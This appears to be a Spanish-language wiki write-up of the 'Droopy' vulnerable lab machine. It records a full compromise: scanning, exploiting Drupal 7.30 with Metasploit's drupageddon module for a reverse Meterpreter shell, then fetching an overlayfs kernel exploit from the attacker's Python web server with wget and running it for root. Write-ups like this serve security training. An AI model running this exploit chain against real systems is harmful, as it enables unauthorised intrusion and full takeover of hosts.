Droopy - danielcastropalomares/security GitHub Wiki

Solo tiene abierto el puerto 80:

root@kali:/tmp# nmap -p- 172.31.255.122 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-15 19:48 CET
Nmap scan report for 172.31.255.122
Host is up (0.00031s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:97:7B:4D (Oracle VirtualBox virtual NIC)

root@kali:/tmp# nmap -A 172.31.255.122
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-15 19:48 CET
Nmap scan report for 172.31.255.122
Host is up (0.00072s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud...
MAC Address: 08:00:27:97:7B:4D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.72 ms 172.31.255.122

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.93 seconds

Si listamos los directorios web:

root@kali:/usr/local/src/gitexd-drupalorg-master/drupalorg# cat /usr/local/src/Osmedeus/workspaces/172.31.255.122/directory/172.31.255.122-dirsearch.txt | grep 200
200    87KB  http://172.31.255.122:80/CHANGELOG.txt
200    10KB  http://172.31.255.122:80/includes/
200     7KB  http://172.31.255.122:80/index.php
200    11KB  http://172.31.255.122:80/index.html
200     2KB  http://172.31.255.122:80/INSTALL.mysql.txt
200    78KB  http://172.31.255.122:80/info.php
200     2KB  http://172.31.255.122:80/INSTALL.pgsql.txt
200     3KB  http://172.31.255.122:80/install.php
200    18KB  http://172.31.255.122:80/INSTALL.txt
200    18KB  http://172.31.255.122:80/LICENSE.txt
200     8KB  http://172.31.255.122:80/MAINTAINERS.txt
200   743B   http://172.31.255.122:80/profiles/standard/standard.info
200   271B   http://172.31.255.122:80/profiles/minimal/minimal.info
200   278B   http://172.31.255.122:80/profiles/testing/testing.info
200     5KB  http://172.31.255.122:80/README.txt
200     2KB  http://172.31.255.122:80/robots.txt
200     3KB  http://172.31.255.122:80/scripts/
200     9KB  http://172.31.255.122:80/UPGRADE.txt
200     2KB  http://172.31.255.122:80/web.config
200    42B   http://172.31.255.122:80/xmlrpc.php

Si echamos un vistazo al CHANGELOG.TXT, podemos ver que se trata de la versión 7.30:

http://172.31.255.122/CHANGELOG.txt
Drupal 7.30, 2014-07-24
-----------------------

Con metaexploit ejecutamos el exploit de drupageddon:

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(multi/http/drupal_drupageddon) > set RHOST 172.31.255.122       
RHOST => 172.31.255.122
msf exploit(multi/http/drupal_drupageddon) > 
msf exploit(multi/http/drupal_drupageddon) > exploit

[*] Started reverse TCP handler on 172.31.255.129:4444 
[*] Sending stage (38247 bytes) to 172.31.255.122
[*] Meterpreter session 1 opened (172.31.255.129:4444 -> 172.31.255.122:54249) at 2018-12-16 12:39:12 +0100
shell
meterpreter > shell

Hemos accedido como usuario www-data:

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Ejecutamos una shell python:

python -c 'import pty;pty.spawn("/bin/bash")'
www-data@droopy:/var/www/html$ 

Buscamos binarios con SUID configurado, pero no encontramos nada:

www-data@droopy:/home$ find / -perm -u=s -type f 2>/dev/null 
find / -perm -u=s -type f 2>/dev/null 
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mtr
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/chsh
/bin/ping6
/bin/mount
/bin/su
/bin/umount
/bin/ping
/bin/fusermount

Revisamos el kernel:

www-data@droopy:/tmp$ uname -a
uname -a
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

Buscamos un exploit para ese kernel en concreto:

root@kali:~# searchsploit linux kernel 3.13
--------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                   |  Path
	                                                                         | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 3.13 - SGID Privilege Escalation                                    | exploits/linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local  | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local  | exploits/linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit)         | exploits/linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service | exploits/linux/dos/36743.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Pr | exploits/linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)  | exploits/linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)                            | exploits/linux/dos/31305.c
--------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Compilamos el exploit:

root@kali:~# gcc /usr/share/exploitdb/exploits/linux/local/37292.c -o /tmp/ofs

Como la maquina victima no tiene scp, vamos a levantar un servidor web temporal con python:

root@kali:/tmp# python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
172.31.255.122 - - [17/Dec/2018 21:50:43] "GET /ofs HTTP/1.1" 200 -

Ahora en la víctima descargamos el exploit:

www-data@droopy:/tmp$ wget http://172.31.255.129:8000/ofs
wget http://172.31.255.129:8000/ofs
--2018-12-15 21:24:43--  http://172.31.255.129:8000/ofs
Connecting to 172.31.255.129:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17608 (17K) [application/octet-stream]
Saving to: 'ofs'

     0K .......... .......                                    100% 16.4M=0.001s

2018-12-15 21:24:43 (16.4 MB/s) - 'ofs' saved [17608/17608]

Lo ejecutamos y ya tenemos acceso root:

www-data@droopy:/tmp$ chmod +x ofs
chmod +x ofs
www-data@droopy:/tmp$ ./ofs
./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#